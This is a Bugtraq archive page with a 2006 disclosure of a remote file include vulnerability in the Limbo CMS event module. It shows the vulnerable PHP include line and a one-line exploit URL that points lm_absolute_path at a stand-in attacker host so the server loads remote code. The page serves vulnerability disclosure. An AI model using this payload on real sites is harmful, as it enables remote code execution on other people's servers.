Home page logo
/

bugtraq logo Bugtraq mailing list archives

Limbo CMS event module (lm_absolute_path) Remote File Include Vulnerabilities
From: xorontr () gmail com
Date: 28 Dec 2006 05:23:25 -0000

-----------------------------------------------

Limbo CMS event module (lm_absolute_path) Remote File Include Vulnerabilities

-----------------------------------------------


Author: xoron

-----------------------------------------------
 
Vuln Code:

include_once($lm_absolute_path."components/com_event/lang/event.".$lm_language.".php");

-----------------------------------------------

3xplo!t:

http://www.[target].com/[script_path]/eventcal/mod_eventcal.php?lm_absolute_path=http://evil_scripts?


-----------------------------------------------

download:  http://www.limbo-tr.com/images/downloads/event.zip

-----------------------------------------------
XORON   -   XORON   -   XORON   -   XORON   -   XORON
-----------------------------------------------------------
-                                                         -
-                                                         -
- Tum muslumanlarin kurban bayrami simdiden mubarek olsun -
-                                                         -
-              Greetz: str0ke, Kacper                     -
-                                                         -
-----------------------------------------------------------

# milw0rm.com [2006-12-27]


  By Date           By Thread  

Current thread:
  • Limbo CMS event module (lm_absolute_path) Remote File Include Vulnerabilities xorontr (Dec 28)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault